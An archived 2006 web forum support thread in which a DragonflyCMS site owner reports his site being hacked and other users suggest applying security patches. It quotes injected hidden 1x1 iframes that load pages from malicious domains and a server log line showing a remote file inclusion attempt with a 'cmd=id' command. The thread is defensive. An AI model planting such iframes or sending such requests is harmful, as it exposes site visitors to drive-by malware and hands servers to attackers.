| Topic Archived |
View previous topic :: View next topic |
| Author |
Message |
jeffk Supporter


Offline Joined: Jun 21, 2004 Posts: 322
|
Posted: Fri Sep 08, 2006 10:22 am Post subject: hacked through index.php |
|
somehow someone modified my index.php file
| Quote:: |
<html dir="ltr" lang="en"><head><base href="http://www.mr2oc.co.uk/"><title>MR2 Owners Club � News</title><meta http-equiv="Content-Type" content="text/html; charset=utf-8" _base_href="http://www.mr2oc.co.uk/"><meta http-equiv="expires" content="0" _base_href="http://www.mr2oc.co.uk/"><meta http-equiv="imagetoolbar" content="no" _base_href="http://www.mr2oc.co.uk/"><meta name="description" content="News Probably the best MR2 club in the world" _base_href="http://www.mr2oc.co.uk/"><meta name="keywords" content="News, news, new, headlines" _base_href="http://www.mr2oc.co.uk/"><meta name="resource-type" content="document" _base_href="http://www.mr2oc.co.uk/"><meta name="distribution" content="global" _base_href="http://www.mr2oc.co.uk/"><meta name="author" content="MR2 Owners Club" _base_href="http://www.mr2oc.co.uk/"><meta name="copyright" content="Copyright (c) 2006 by MR2 Owners Club" _base_href="http://www.mr2oc.co.uk/"><meta name="robots" content="index, follow" _base_href="http://www.mr2oc.co.uk/"><meta name="rating" content="general" _base_href="http://www.mr2oc.co.uk/"><meta name="generator" content="CPG Dragonfly CMS: Copyright (c) 2003-2006 by CPG-Nuke Development Team, dragonflycms.org" _base_href="http://www.mr2oc.co.uk/"><meta name="MSSmartTagsPreventParsing" content="true" _base_href="http://www.mr2oc.co.uk/"><link rel="shortcut icon" href="themes/cpgnuke/images/favicon.ico" type="image/x-icon" _base_href="http://www.mr2oc.co.uk/"><link rel="copyright" href="index.php?name=credits" title="Copyrights" _base_href="http://www.mr2oc.co.uk/"><link rel="author" href="index.php?name=Members_List" title="Members List" _base_href="http://www.mr2oc.co.uk/"><link rel="alternate" type="application/rss+xml" title="RSS" href="rss/news2.php" _base_href="http://www.mr2oc.co.uk/"><link rel="stylesheet" type="text/css" href="themes/cpgnuke/style/style.css" _base_href="http://www.mr2oc.co.uk/"></head><body><iframe src="http://yauwvhhzml.biz/dl/adv442.php" height="1" width="1"></iframe>?
|
| Quote:: |
| <iframe src="http://yauwvhhzml.biz/dl/adv442.php" width=1 height=1></iframe><?php |
this caused a script popup window and froze IE
i uploaded the default index.php file and it appears to be ok now
how do i stop this happening again ?
jeffk's server specs (Server OS / Apache / MySQL / PHP / DragonflyCMS) CMS Version 9.1.2.1HP Version 4.4.4MySQL Version 4.1.22-standard (client: 4.1.22
|
|
| Back to top |
|
 |
spacebar Dragonfly addicted


Offline Joined: Sep 28, 2005 Posts: 413 Location: Providence
|
Posted: Sat Sep 09, 2006 12:21 am Post subject: Re: hacked through index.php |
|
Its right above the topic you just posted:
Forums/viewtopic/t=2864.html
_________________

spacebar's server specs (Server OS / Apache / MySQL / PHP / DragonflyCMS) Unix / 2.0.46 (Red Hat) / 0.9.7a / 4.1.9-standard / 4.3.2 / 9.0.6.1
|
|
| Back to top |
|
 |
jeffk Supporter


Offline Joined: Jun 21, 2004 Posts: 322
|
Posted: Sat Sep 09, 2006 7:51 am Post subject: Re: hacked through index.php |
|
no its not , that post only says what to do after a hack , im asking how to prevent this happening again
_________________ CMS Version 9.1.2.1
PHP Version 4.4.4
MySQL Version 4.1.22-standard (client: 4.1.22)
jeffk's server specs (Server OS / Apache / MySQL / PHP / DragonflyCMS) CMS Version 9.1.2.1HP Version 4.4.4MySQL Version 4.1.22-standard (client: 4.1.22
|
|
| Back to top |
|
 |
spacebar Dragonfly addicted


Offline Joined: Sep 28, 2005 Posts: 413 Location: Providence
|
Posted: Sat Sep 09, 2006 12:23 pm Post subject: Re: hacked through index.php |
|
From that post:
| Quote:: |
Before anyone can help or offer suggestions you need to understand and provide a few bits of information first.
|
You have to gather certain info to lean how you were hacked. Without knowing how you were hacked, how can you prevent it?
1. What type of server are you using?
2. What software is the server running on your site?
3. What is your provider using for a control panel to administer your site?
4. Stay on top of patches and security notes that are released. Is this the case for you?
6. Review the logs.
7. Report the incident to your host/provider/law enforcement/other agency. What did your service provider/host say?
_________________

spacebar's server specs (Server OS / Apache / MySQL / PHP / DragonflyCMS) Unix / 2.0.46 (Red Hat) / 0.9.7a / 4.1.9-standard / 4.3.2 / 9.0.6.1
|
|
| Back to top |
|
 |
jeffk Supporter


Offline Joined: Jun 21, 2004 Posts: 322
|
Posted: Mon Sep 11, 2006 7:30 am Post subject: Re: hacked through index.php |
|
this keeps happening over and over
| Quote:: |
"GET /index.php?name=Your_Account&profile=http://busca.uol.com.br/uol/index.html?&cmd=id HTTP/1.1" 200 5 "-" "-"
|
taken from server log
jeffk's server specs (Server OS / Apache / MySQL / PHP / DragonflyCMS) CMS Version 9.1.2.1HP Version 4.4.4MySQL Version 4.1.22-standard (client: 4.1.22
|
|
| Back to top |
|
 |
alva 1000+ Posts Club


Offline Joined: May 31, 2005 Posts: 1150 Location: The Netherlands
|
Posted: Mon Sep 11, 2006 7:45 am Post subject: Re: hacked through index.php |
|
| jeffk wrote: |
this keeps happening over and over
| Quote:: |
"GET /index.php?name=Your_Account&profile=http://busca.uol.com.br/uol/index.html?&cmd=id HTTP/1.1" 200 5 "-" "-"
|
taken from server log |
Are you sure you have applied the official 9.0.6.1 security patches? (xss fixes and more)
alva's server specs (Server OS / Apache / MySQL / PHP / DragonflyCMS) Linux/Apache/5.0.24/5/9.1 CVS
|
|
| Back to top |
|
 |
jeffk Supporter


Offline Joined: Jun 21, 2004 Posts: 322
|
Posted: Mon Sep 11, 2006 7:53 am Post subject: Re: hacked through index.php |
|
tbh , no
ive installed what ive seen on the forums
xss fixes , dont think so
is there a central place for all updates please ?
_________________ CMS Version 9.1.2.1
PHP Version 4.4.4
MySQL Version 4.1.22-standard (client: 4.1.22)
jeffk's server specs (Server OS / Apache / MySQL / PHP / DragonflyCMS) CMS Version 9.1.2.1HP Version 4.4.4MySQL Version 4.1.22-standard (client: 4.1.22
|
|
| Back to top |
|
 |
alva 1000+ Posts Club


Offline Joined: May 31, 2005 Posts: 1150 Location: The Netherlands
|
Posted: Mon Sep 11, 2006 7:59 am Post subject: Re: hacked through index.php |
|
| jeffk wrote: |
is there a central place for all updates please ? |
They're in the sticky topic in this Forum and they used to be announced through system update notification.
Hmmm, apart from those four fixes there's another 9.0.6.1 fix here as well: cvs/html/modules/Your_Account/index.php?v=9.17.2.1
EDIT: download is here
alva's server specs (Server OS / Apache / MySQL / PHP / DragonflyCMS) Linux/Apache/5.0.24/5/9.1 CVS
|
|
| Back to top |
|
 |
Beldak Nice poster


Offline Joined: Jun 15, 2005 Posts: 78 Location: Edwards AFB, CA
|
Posted: Mon Sep 11, 2006 5:19 pm Post subject: Re: hacked through index.php |
|
Perhaps an official 9.0.6.2 would be in order with the applicable security patches? Might help some of our less technically inclined folks.
Beldak's server specs (Server OS / Apache / MySQL / PHP / DragonflyCMS) Linux 2.4.32 / Apache 1.3.37 / MySQL 5.0.16 / PHP 5.2.2 / Dragonfly CVS
|
|
| Back to top |
|
 |
lanmonkey Nice poster


Offline Joined: Aug 21, 2006 Posts: 64
|
Posted: Tue Sep 12, 2006 10:48 am Post subject: Re: hacked through index.php |
|
| Beldak wrote: |
Perhaps an official 9.0.6.2 would be in order with the applicable security patches? Might help some of our less technically inclined folks.  |
That sounds like a good idea
lanmonkey's server specs (Server OS / Apache / MySQL / PHP / DragonflyCMS) CentOS/1.3.37 (Unix)/4.1.21/4.4.3/9.0.6.1
|
|
| Back to top |
|
 |
jeffk Supporter


Offline Joined: Jun 21, 2004 Posts: 322
|
Posted: Tue Sep 12, 2006 9:15 pm Post subject: Re: hacked through index.php |
|
uploaded all the fixes i can find
keep getting iframes added to the site , just had a drive cleaner popup
sample of iframe injection
| Quote:: |
<div class="table1">
<div class="option" align="center"></div>
<div style="text-align:center"><img src="http://i16.photobucket.com/albums/b36/falinn/JAE%2006/DSC_6909.jpg" border="0" alt="" /></div> </div><br />
<iframe src=http://x-road.co.kr/rich/out.php width=1 height=1></iframe>
<iframe src=http://x-road.co.kr/rich/out.php width=1 height=1></iframe>
<table class="newstable">
<tr>
<td class="newstopic"><a href="index.php?name=News&topic=1"><img src="images/topics/beamsnews.gif" alt="latest news" border="0" /></a></td>
<td class="newsarticle"> |
jeffk's server specs (Server OS / Apache / MySQL / PHP / DragonflyCMS) CMS Version 9.1.2.1HP Version 4.4.4MySQL Version 4.1.22-standard (client: 4.1.22
|
|
| Back to top |
|
 |
alva 1000+ Posts Club


Offline Joined: May 31, 2005 Posts: 1150 Location: The Netherlands
|
Posted: Tue Sep 12, 2006 10:13 pm Post subject: Re: hacked through index.php |
|
Hmm, i suddenly wondered if it could be an security problem with a third party module. Unfortunately your site gives a blank page now.
alva's server specs (Server OS / Apache / MySQL / PHP / DragonflyCMS) Linux/Apache/5.0.24/5/9.1 CVS
|
|
| Back to top |
|
 |
jeffk Supporter


Offline Joined: Jun 21, 2004 Posts: 322
|
Posted: Tue Sep 12, 2006 10:20 pm Post subject: Re: hacked through index.php |
|
speaking to the server hosting company atm
seems like a new ftp account was created , they are unsure how
seems like very directory has had an index.html file created
ie /home/xxxxx/public_html/language/index.html
there hunders of altered files on the server now
the index file contents are
<iframe src=http://x-road.co.kr/rich/out.php width=1 height=1></iframe>
<iframe src=http://x-road.co.kr/rich/out.php width=1 height=1></iframe>
_________________ CMS Version 9.1.2.1
PHP Version 4.4.4
MySQL Version 4.1.22-standard (client: 4.1.22)
jeffk's server specs (Server OS / Apache / MySQL / PHP / DragonflyCMS) CMS Version 9.1.2.1HP Version 4.4.4MySQL Version 4.1.22-standard (client: 4.1.22
|
|
| Back to top |
|
 |
WebSiteGuru 1000+ Posts Club


Offline Joined: Jun 09, 2005 Posts: 2318
|
Posted: Tue Sep 12, 2006 10:22 pm Post subject: Re: hacked through index.php |
|
Looks fine from where I am at. No POPUP or Iframe.
_________________ Lead Theme Designer - WebSiteGuru Designs
WebSiteGuru's server specs (Server OS / Apache / MySQL / PHP / DragonflyCMS) Linux 2.6.9 / Apache 2.2.6 / MySQL 5.0.27 / PHP 5 / DF Version 9.2.1
|
|
| Back to top |
|
 |
jeffk Supporter


Offline Joined: Jun 21, 2004 Posts: 322
|
Posted: Tue Sep 12, 2006 10:26 pm Post subject: Re: hacked through index.php |
|
it was just above the news items , in FF it was two small squares
the host is uploading last nights back up atm , so it prolly wont be available for a while
_________________ CMS Version 9.1.2.1
PHP Version 4.4.4
MySQL Version 4.1.22-standard (client: 4.1.22)
jeffk's server specs (Server OS / Apache / MySQL / PHP / DragonflyCMS) CMS Version 9.1.2.1HP Version 4.4.4MySQL Version 4.1.22-standard (client: 4.1.22
|
|
| Back to top |
|
 |
|
|